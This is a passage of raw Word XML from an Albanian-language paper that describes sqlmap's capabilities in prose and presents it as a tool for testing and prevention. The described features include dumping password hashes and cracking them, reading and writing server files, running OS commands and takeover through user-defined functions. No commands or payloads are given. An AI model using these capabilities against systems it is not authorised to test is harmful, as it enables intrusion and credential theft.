          <w:tab w:val="left" w:pos="1299"/>
          <w:tab w:val="left" w:pos="1300"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_TOC_250003"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B4"/>
        </w:rPr>
        <w:t>Qëllimi i punimit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423A84C6" w14:textId="77777777" w:rsidR="00E30322" w:rsidRDefault="00E30322" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56EA821E" w14:textId="79756416" w:rsidR="002E53ED" w:rsidRDefault="002E53ED" w:rsidP="00E30322">
      <w:pPr>
        <w:ind w:firstLine="580"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Veçori e rëndësishme</w:t>
      </w:r>
      <w:r w:rsidR="00C350F5">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> e Sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> është që lejon apo</w:t>
      </w:r>
      <w:r w:rsidR="00C350F5">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> jep mbështetje përdoruesit në shkarkimin </w:t>
      </w:r>
      <w:r w:rsidRPr="00073E85">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>dhe ngarkimin e skedarëve të sistemit në llojet e bazave të të dhëna si: Microsoft SQL Server , MySQL ose PostgreSQL.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF sqlmap \h </w:instrText>
      </w:r>
      <w:r w:rsidR="000C31F5">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00717774">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF sqlmapOfficial \h </w:instrText>
      </w:r>
      <w:r w:rsidR="000C31F5">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00717774">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="005B082C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00717774">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1112243E" w14:textId="7F9CD0ED" w:rsidR="00DE2B3A" w:rsidRDefault="00DE2B3A" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2B3A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Sqlmap i jep mbështetje te plotë MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redsh Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB dhe FrontBase sistemeve të menaxhimit të bazës së të dhënave</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E081E57" w14:textId="23D8E439" w:rsidR="00C350F5" w:rsidRDefault="00C350F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Sqlmap ka shum</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ve</w:t>
      </w:r>
      <w:r>
        <w:t>ç</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ori t</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> cilat jan</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> arsye t</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> mjaftueshme p</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>r t</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> p</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>rzgjedhur k</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> mjet p</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>r testim dhe pasaj parandalim t</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> sulmeve.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F44A289" w14:textId="77777777" w:rsidR="00EF2D7F" w:rsidRDefault="00EF2D7F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B647FBC" w14:textId="23218A96" w:rsidR="00105B37" w:rsidRDefault="00EF2D7F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF2D7F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Karakteristikat gjenerike</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0196D746" w14:textId="36293C34" w:rsidR="00105B37" w:rsidRPr="0004393A" w:rsidRDefault="00105B37" w:rsidP="00E30322">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105B37">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Sqlmap mund të lidhet direkt me bazën e të dhënave pa kaluar përmes një SQL injektimi, duke siguruar kredencialet, adresën IP, portin dhe emrin e bazës së të dhënave, ku si përfundim mund të nxjerr numrin e përdoruesit, hash fjalëkalimin, privilegjet, rolet, tabelat dhe kolonat. Poashtu mund të bëjë njohjen automatike e formateve të hash-it të fjalëkalimit dhe mbështetje për thyerjen e tyre duke përdorur një sulm të bazuar në fjalor. Mbështet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>frijen</w:t>
      </w:r>
      <w:r w:rsidRPr="00105B37">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> e të gjitha tabelave të bazës së të dhënave, një sërë shënimesh ose kolona specifike sipas zgjedhjes së përdoruesit. Mbështet kërkimin për emra specifik të bazës së të dhënave, tabela specifike në të gjitha bazat e të dhënave ose kolona specifike në të gjitha tabelat e bazave të të dhënave. Mbështetje për të shkarkuar dhe ngarkuar ndonjë file nga sistemi i file-it themelor të serverit të bazës së të dhënave kur softueri i bazës së të dhënave është MySQL, PostgreSQL ose Microsoft SQL Server. Gjithashtu mund të  ekzekutoj komanda arbitrare  për të rimarrë prodhimin e tyre standard në serverin e bazës së të dhënave që qëndron në sistemin operativ kur softueri i bazës së të dhënave është MySQL, PostgreSQL ose Microsoft SQL Server. Mbështetje për të përsëritur strukturën e tabelave të bazës së të dhënave back-end dhe shënimet në një bazë të të dhënave lokale SQLite 3 dhe mbështetje për të vendosur një lidhje të paqëndrueshme TCP jashtë bandës midis makinës sulmuese dhe serverit të bazës së të dhënave që qëndron në sistemin operativ. [</w:t>
      </w:r>
      <w:r w:rsidR="005B082C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00105B37">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8DD1E8" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="745A68DF" w14:textId="1785181F" w:rsidR="00EF2D7F" w:rsidRDefault="00EF2D7F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc59567384"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14CE8">
        <w:t>Karakteristikat e numërimit dhe fingerprint-it</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="00E14CE8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B762E32" w14:textId="77777777" w:rsidR="00EF2D7F" w:rsidRPr="00C003A2" w:rsidRDefault="00EF2D7F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB470EF" w14:textId="2A13E823" w:rsidR="00EF2D7F" w:rsidRDefault="00EF2D7F" w:rsidP="00E30322">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mb</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shtet s</w:t>
      </w:r>
      <w:r w:rsidRPr="002D0084">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">oftuer të thjeshtë të ueb serverit dhe teknologji fingerprint të ueb aplikacioneve. Mbështetje për të numëruar përdoruesit e </w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bazë e të dhënave</w:t>
      </w:r>
      <w:r w:rsidRPr="002D0084">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s, hash të fjalekalimeve, rolet dhe  privilegjet e përdoruesve, </w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bazat e të dhënave</w:t>
      </w:r>
      <w:r w:rsidRPr="002D0084">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">t, tabelat dhe kolonat. Formatin për njohjen automatike të hash të fjalekalimeve dhe mbështetjen  për thyerjen e tyre me një sulm të bazuar në ndonjë fjalor. Mbështetje për të brute-force emrin e tabelave dhe kolonave. Mbështetje për kërkimin e emrave të vecantë të </w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bazë e të dhënave</w:t>
      </w:r>
      <w:r w:rsidRPr="002D0084">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s, tabelave të vecanta në </w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bazë e të dhënave</w:t>
      </w:r>
      <w:r w:rsidRPr="002D0084">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> apo kolonave të vecanta në tabela.Kjo ështeë e nevojshme për të identifikuar tabelat që përmbajnë të dhënat kredenciale të aplikacionit, ku emrat e kolonave përkatese përmbajnë string si emrin dhe fjalëkalimin. Mbështetje për ekzekutimin e custom SQL statements si në rastin kur një klient interaktiv SQL lidhet me </w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bazë e të dhënave</w:t>
      </w:r>
      <w:r w:rsidRPr="002D0084">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n back-end, sqlmap automatikisht zbërthen statement e dhënë dhe përcakton se cila metodë përshtatet më së miri për injektim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38452D6F" w14:textId="77777777" w:rsidR="00EF2D7F" w:rsidRDefault="00EF2D7F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc59567385"/>
    </w:p>
    <w:p w14:paraId="3B1D1702" w14:textId="50ECCFFE" w:rsidR="00EF2D7F" w:rsidRDefault="00EF2D7F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14CE8">
        <w:t>Takeover  karakteristikat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidRPr="00E14CE8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660885C2" w14:textId="5787BB7B" w:rsidR="00EF2D7F" w:rsidRPr="000A6063" w:rsidRDefault="00EF2D7F" w:rsidP="00E30322">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002D0084">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mbështet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D0084">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shkark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>imin</w:t>
      </w:r>
      <w:r w:rsidRPr="002D0084">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> dhe ngark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>imin</w:t>
      </w:r>
      <w:r w:rsidRPr="002D0084">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">të </w:t>
      </w:r>
      <w:r w:rsidRPr="002D0084">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ç</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>farë</w:t>
      </w:r>
      <w:r w:rsidRPr="002D0084">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>do file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-i</w:t>
      </w:r>
      <w:r w:rsidRPr="002D0084">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> nga serveri i bazës së të dhënave që qëndron në themel të sistemit kur programi i bazës së të dhënave është MySQL, PostgreSQL ose Microsoft SQL Server</w:t>
      </w:r>
      <w:bookmarkStart w:id="4" w:name="_Hlk535100383"/>
      <w:r>
        <w:t>, përkrahe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> poashtu injektimin e</w:t>
      </w:r>
      <w:r w:rsidRPr="002D0084">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> funksione</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ve</w:t>
      </w:r>
      <w:r w:rsidRPr="002D0084">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> të personalizuara të përdoruesit: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">një </w:t>
      </w:r>
      <w:r w:rsidRPr="002D0084">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">përdorues mund të përpilojë një bibliotekë të përbashkët, pastaj të përdorë sqlmap për të </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>realizuar ndryshime</w:t>
      </w:r>
      <w:r w:rsidRPr="002D0084">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> brenda funksioneve të përdoruesit të </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sistemit të menaxhimit të </w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bazë e të dhënave</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="002D0084">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Këto </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>funksione</w:t>
      </w:r>
      <w:r w:rsidRPr="002D0084">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> mund të ekzekutohen, dhe të hiqen opsionalisht, përmes sqlmap. Kjo suportohet  kur softueri i bazës së të dhënave është MySQL ose PostgreSQL.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="4"/>
    <w:p w14:paraId="20AA8C9F" w14:textId="77777777" w:rsidR="00EF2D7F" w:rsidRDefault="00EF2D7F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69E7A774" w14:textId="77777777" w:rsidR="00EF2D7F" w:rsidRDefault="00EF2D7F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D895E64" w14:textId="112D3A8F" w:rsidR="00EF2D7F" w:rsidRPr="002C682F" w:rsidRDefault="002C682F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
